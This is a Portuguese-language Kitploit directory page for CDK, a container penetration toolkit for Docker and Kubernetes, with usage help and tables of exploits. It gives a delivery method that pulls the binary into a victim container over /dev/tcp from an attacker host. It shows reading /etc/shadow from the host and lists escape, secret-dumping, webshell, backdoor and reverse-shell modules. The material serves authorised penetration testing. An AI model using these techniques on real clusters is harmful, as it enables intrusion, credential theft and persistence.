Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CDK — 📦 Torne mais fácil os testes de segurança de K8s, Docker e Containerd. | Kitploit
Ferramentas/GitHubGitHub/cdk-team/cdk
Escalada de PrivilégiosReconhecimentoSegurança de ContêineresMecanismos de PersistênciaExploraçãoMovimento LateralPós-ExploraçãoTestes de PenetraçãoSegurança na NuvemEscape de ContêinerTop em Escape de Contêiner nº2
4.7k60611há 4 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHubcdk-team/cdk

CDK

📦 Torne mais fácil os testes de segurança de K8s, Docker e Containerd.

Ver RepositórioSite

CDK - Kit de Penetração em Contêineres com Zero Dependência

Inglês | 简体中文

png

Aviso Legal

O uso do CDK para atacar alvos sem consentimento mútuo prévio é ilegal. O CDK é apenas para fins de teste de segurança.

Visão Geral

O CDK é um kit de ferramentas de penetração em contêineres de código aberto, projetado para oferecer exploração estável em diferentes contêineres reduzidos sem qualquer dependência de SO. Ele vem com ferramentas de rede úteis e muitos PoCs/EXPs poderosos e ajuda a escapar do contêiner e assumir o controle do cluster K8s facilmente.

Início Rápido

Execute cdk eva para obter informações de avaliação e um exploit recomendado, depois execute cdk run para iniciar o ataque.

root@kitploit:~
> ./cdk eva --full

[*] Talvez você possa explorar as *Capabilities* abaixo:
[!] CAP_DAC_READ_SEARCH ativada. Você pode ler arquivos do host. Use 'cdk run cap-dac-read-search' ... para exploração.
[!] CAP_SYS_MODULE ativada. Você pode escapar do contêiner carregando módulo do kernel. Mais informações em https://xcellerator.github.io/posts/docker_escape/.
Crítico - CAP_SYS_ADMIN encontrada. Tente 'cdk run rewrite-cgroup-devices/mount-cgroup/...'.
Crítico - Possível Contêiner Privilegiado Encontrado.

> ./cdk run cap-dac-read-search

Executando com alvo: /etc/shadow, referência: /etc/hostname
ubuntu:$6$*******:19173:0:99999:7:::
root:*:18659:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::

Instalação/Entrega

Baixe o último lançamento em https://github.com/cdk-team/CDK/releases/

Coloque os arquivos executáveis no contêiner alvo e comece os testes.

DICAS: Entregar CDK no contêiner alvo em testes de penetração reais

Se você tem um exploit que pode enviar um arquivo, então você pode enviar o binário CDK diretamente.

Se você tem um exploit RCE, mas o contêiner alvo não possui curl ou wget, você pode usar o seguinte método para entregar o CDK:

  1. Primeiro, hospede o binário CDK no seu host com IP público.
root@kitploit:~
(no seu host)
nc -lvp 999 < cdk
  1. Dentro do contêiner vítima execute
root@kitploit:~
cat < /dev/tcp/(seu_ip_host_público)/(porta) > cdk
chmod a+x cdk

Uso

root@kitploit:~
Uso:
  cdk evaluate [--full]
  cdk run (--list | <exploit> [<args>...])
  cdk <tool> [<args>...]

Avaliar:
  cdk evaluate                              Coletar informações para encontrar fraquezas dentro do contêiner.
  cdk evaluate --full                       Ativar varredura de arquivos durante a coleta de informações.

Exploit:
  cdk run --list                            Listar todos os exploits disponíveis.
  cdk run <exploit> [<args>...]             Executar um único exploit, docs em https://github.com/cdk-team/CDK/wiki

Ferramenta:
  vi <file>                                 Editar arquivos no contêiner como o comando "vi".
  ps                                        Mostrar informações de processos como o comando "ps -ef".
  nc [options]                              Criar túnel TCP.
  ifconfig                                  Mostrar informações de rede.
  kcurl <path> (get|post) <uri> <data>      Fazer requisição ao api-server K8s.
  ectl <endpoint> get <key>                 Enumeração não autorizada de chaves ectd.
  ucurl (get|post) <socket> <uri> <data>    Fazer requisição ao socket unix do Docker.
  probe <ip> <port> <parallel> <timeout-ms> Varredura de porta TCP, exemplo: cdk probe 10.0.1.0-255 80,8080-9443 50 1000

Opções:
  -h --help     Mostrar esta mensagem de ajuda.
  -v --version  Mostrar versão.
  --profile=<nome> Selecionar perfil de avaliação.

Funcionalidades

O CDK tem três módulos:

  1. Avaliar: coletar informações dentro do contêiner para encontrar potenciais fraquezas.
  2. Exploit: para escapar do contêiner, persistência e movimento lateral
  3. Ferramenta: ferramentas de rede e APIs para requisições TCP/HTTP, túneis e gerenciamento de cluster K8s.

Módulo de Avaliação

Uso

root@kitploit:~
cdk evaluate [--full]

Módulo de Exploit

Listar todos os exploits disponíveis:

root@kitploit:~
cdk run --list

Executar exploit específico:

root@kitploit:~
cdk run <nome-do-script> [opções]

Nota sobre Thin: O lançamento thin é preparado para shells de contêiner de vida curta, como funções serverless. Adicionamos tags de build no código fonte e cortamos alguns exploits para tornar o binário mais leve. O arquivo de 2MB contém 90% das funções do CDK; você também pode pegar exploits úteis no código fonte do CDK para construir seu próprio binário leve.

Módulo de Ferramenta

Executar comandos como no Linux, um pouco diferente nos argumentos de entrada, veja o link de uso.

root@kitploit:~
cdk nc [options]
cdk ps

Documento de Lançamento

Se você quiser saber como lançamos uma nova versão, como o thin é produzido, por que fornecemos versões upx, quais as diferenças entre as diferentes versões sobre all, normal, thin, upx, e como escolher exploits e ferramentas específicas do CDK para compilar um lançamento próprio para você, por favor verifique o Documento de Lançamento.

Documentos para Desenvolvedores

  • executar teste no contêiner.

Contribuindo com o CDK

Primeiramente, obrigado por dedicar seu tempo para contribuir!

Agradecimentos aos seguintes contribuidores:

Mais contribuidores: Lista de Contribuidores

Reportando Bugs

Bugs são rastreados como GitHub Issues. Crie uma issue com a versão atual do CDK, mensagem de erro e o ambiente. Descreva os passos exatos que reproduzem o problema.

Sugerindo Melhorias

Sugestões de melhorias são rastreadas como GitHub Discussions. Você pode publicar qualquer pensamento aqui para discutir diretamente com os desenvolvedores.

Pull Requests

Corrija problemas ou mantenha a qualidade do CDK:

  • Descreva a versão atual do CDK, ambiente, problema e passos exatos que reproduzem o problema.
  • Capturas de tela ou logs da execução antes e depois de você corrigir o problema.

Nova funcionalidade ou exploits:

  • Explique por que esta melhoria seria útil para outros usuários.
  • Por favor, forneça um ambiente sustentável para revisarmos as contribuições.
  • Capturas de tela sobre como esta nova funcionalidade funciona.
  • Se você está enviando um novo script de avaliação/exploit, adicione um documento simples na sua mensagem de PR, aqui está um exemplo.

Eventos

404StarLink 2.0 - Galaxy

png

O Projeto CDK agora está incluído no Starlink Project 2.0 da 404Team. Junte-se à comunidade StarLink para entrar em contato com a equipe de desenvolvimento do CDK.

  • https://github.com/knownsec/404StarLink2.0-Galaxy#community

BlackHat Asia 2021 Arsenal

  • https://www.blackhat.com/asia-21/arsenal/schedule/index.html#cdk-zero-dependency-container-penetration-toolkit-22422

HITB SecConf 2021 Amsterdam

  • Briefing: "Attack Cloud Native Kubernetes"

WHC 2021 (补天白帽大会)

  • CDK: Also a Awesome BugBounty Tool for Cloud Platform

KCON 2021 Arsenal

  • http://kcon.knownsec.com/2021/#/arsenal

Kubernetes community Days 2021

  • https://community.cncf.io/events/details/cncf-kcd-china-presents-kubernetes-community-days-china/
Baixar ferramenta
TáticaScriptSuportadoUso/Exemplo
Coleta de InformaçõesInformações Básicas do SO✔link
Coleta de InformaçõesCapabilities Disponíveis✔link
Coleta de InformaçõesComandos Linux Disponíveis✔link
Coleta de InformaçõesMontagens✔link
Coleta de InformaçõesNamespace de Rede✔link
Coleta de InformaçõesENV Sensíveis✔link
Coleta de InformaçõesProcessos Sensíveis✔link
Coleta de InformaçõesArquivos Locais Sensíveis✔link
Coleta de InformaçõesKube-proxy Route Localnet(CVE-2020-8558)✔link
Coleta de InformaçõesDescoberta de Serviços Baseada em DNS✔link
DescobertaInformações do Api-server K8s✔link
DescobertaInformações da Service-account K8s✔link
DescobertaAPI de Metadados do Provedor de Nuvem✔link
TáticaTécnicaNome do Exploit CDKSuportadoEm ThinDoc
Escapamentodocker-runc CVE-2019-5736runc-pwn✔✔
Escapamentocontainerd-shim CVE-2020-15257shim-pwn✔link
Escapamentodocker.sock PoC (ataque DIND)docker-sock-check✔✔link
Escapamentodocker.sock RCEdocker-sock-pwn✔✔link
EscapamentoDocker API(2375) RCEdocker-api-pwn✔✔link
EscapamentoEscapamento por Montagem de Dispositivomount-disk✔✔link
EscapamentoEscapamento LXCFSlxcfs-rw✔✔link
EscapamentoEscapamento Cgroupsmount-cgroup✔✔link
EscapamentoAbusar do Namespace de Usuário Não Privilegiado para Escapar CVE-2022-0492abuse-unpriv-userns✔✔link
EscapamentoEscapamento Procfsmount-procfs✔✔link
EscapamentoEscapamento Ptrace PoCcheck-ptrace✔✔link
EscapamentoReescrever Cgroup(devices.allow)rewrite-cgroup-devices✔✔link
EscapamentoLer arquivo arbitrário do sistema host (CAP_DAC_READ_SEARCH)cap-dac-read-search✔✔link
DescobertaSonda de Componentes K8sservice-probe✔✔link
DescobertaDespejar Meta do Sidecar Istioistio-check✔✔link
DescobertaDespejar Políticas de Segurança de Pod K8sk8s-psp-dump✔link
Controle RemotoReverse Shellreverse-shell✔✔link
Controle RemotoKubelet Execkubelet-exec✔✔
Acesso a CredenciaisForça Bruta em Registryregistry-brute✔✔link
Acesso a CredenciaisVarredura de Chaves de Acessoak-leakage✔✔link
Acesso a CredenciaisObter Token K8s do Etcdetcd-get-k8s-token✔✔
Acesso a CredenciaisDespejar Secrets do K8sk8s-secret-dump✔✔link
Acesso a CredenciaisDespejar Config do K8sk8s-configmap-dump✔✔link
Escalação de PrivilégioBypass de RBAC K8sk8s-get-sa-token✔✔link
Escalação de PrivilégioCVE-2026-31431 copy-fail (non-root→root & x86_64 only)copy-fail-cve-2026-31431✔link
PersistênciaImplantar WebShellwebshell-deploy✔✔link
PersistênciaImplantar Pod Backdoork8s-backdoor-daemonset✔✔link
PersistênciaImplantar api-server K8s Sombrak8s-shadow-apiserver✔link
PersistênciaAtaque MITM K8s (CVE-2020-8554)k8s-mitm-clusterip✔✔link
PersistênciaImplantar CronJob K8sk8s-cronjob✔✔link
ComandoDescriçãoSuportadoUso/Exemplo
ncTúnel TCP✔link
psInformações de Processo✔link
netstatComo o comando "netstat -antup"✔
ifconfigInformações de Rede✔link
viEditar Arquivos✔link
ectlEnumeração não autorizada de chaves ectd✔
kcurlRequisição ao api-server K8s✔link
dcurlRequisição à API HTTP do Docker✔link
ucurlRequisição ao Socket Unix do Docker✔link
rcurlRequisição à API do Registry Docker
probeVarredura IP/Porta✔link